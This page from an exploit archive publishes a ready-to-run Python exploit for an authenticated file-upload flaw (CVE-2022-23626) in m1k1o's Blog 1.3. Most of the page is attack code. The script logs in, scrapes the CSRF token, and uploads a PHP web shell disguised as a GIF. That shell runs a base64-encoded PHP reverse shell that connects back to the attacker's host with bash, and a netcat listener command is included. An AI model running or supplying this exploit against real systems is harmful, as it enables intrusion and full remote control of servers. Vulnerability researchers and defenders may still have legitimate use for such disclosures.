exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

m1k1o's Blog 1.3 Remote Code Execution

m1k1o's Blog 1.3 Remote Code Execution
Posted May 23, 2022
Authored by Malte V

m1k1o's Blog versions 1.3 and below suffer from an authenticated remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2022-23626
SHA-256 | 2b47e9371ac01f9cd3b2a32ec2b181b1cd6add45c1a4c22f0a31ba5ce0bfacb1

m1k1o's Blog 1.3 Remote Code Execution

Change Mirror Download
# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626

import argparse
import json
import re
from base64 import b64encode
import requests as req
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost',
required=False)
parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081,
required=False)
parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999,
required=False)
parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)

args = vars(parser.parse_args())

username = args['username']
password = args['password']
lhost_ip = args['ip']
lhost_port = args['lport']
address = args['url']
port = args['port']
url = f"http://{address}:{port}"

blog_cookie = ""
csrf_token = ""
exploit_file_name = ""
header = {
"Host": f"{address}",
"Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}


def get_cookie(complete_url):
global blog_cookie
cookie_header = {}
if not blog_cookie:
cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
result = req.get(url=complete_url, headers=cookie_header)
if result.status_code == 200:
blog_cookie = result.cookies.get_dict()['PHPSESSID']
print(f'[+] Found PHPSESSID: {blog_cookie}')
grep_csrf(result)


def grep_csrf(result):
global csrf_token
csrf_regex = r"[a-f0-9]{10}"
soup = BeautifulSoup(result.text, 'html.parser')
script_tag = str(soup.findAll('script')[1].contents[0])
csrf_token = re.search(csrf_regex, script_tag).group(0)
print(f'[+] Found CSRF-Token: {csrf_token}')


def login(username, password):
get_cookie(url)
login_url = f"{url}/ajax.php"
login_data = f"action=login&nick={username}&pass={password}"
login_header = {
"Host": f"{address}",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
result = req.post(url=login_url, headers=login_header, data=login_data)
soup = BeautifulSoup(result.text, 'html.parser')
login_content = json.loads(soup.text)
if login_content.get('logged_in'):
print('[*] Successful login')
else:
print('[!] Bad login')


def set_cookie(result):
global blog_cookie
blog_cookie = result.cookies.get_dict()['PHPSESSID']


def generate_payload(command):
return f"""
-----------------------------13148889121752486353560141292
Content-Disposition: form-data; name="file"; filename="malicious.gif.php"
Content-Type: application/x-httpd-php

GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>;
-----------------------------13148889121752486353560141292--
"""


def send_payload():
payload_header = {
"Host": f"{address}",
"Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"X-Requested-With": "XMLHttpRequest",
"Csrf-Token": f"{csrf_token}",
"Cookie": f"PHPSESSID={blog_cookie}"
}
upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
payload = generate_payload(command)
print(f"[+] Upload exploit")
result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
set_exploit_file_name(result.content.decode('ascii'))


def set_exploit_file_name(data):
global exploit_file_name
file_regex = r"[a-zA-Z0-9]{4,5}.php"
exploit_file_name = re.search(file_regex, data).group(0)


def call_malicious_php(file_name):
global header
complete_url = f"{url}/data/i/{file_name}"
print('[*] Calling reverse shell')
result = req.get(url=complete_url)


def check_reverse_shell():
yes = {'yes', 'y', 'ye', ''}
no = {'no', 'n'}
choice = input("Have you got an active netcat listener (y/Y or n/N): ")
if choice in yes:
return True
elif choice in no:
print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
return False

def main():
enabled_listener = check_reverse_shell()
if enabled_listener:
login(username, password)
send_payload()
call_malicious_php(exploit_file_name)


if __name__ == "__main__":
main()

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close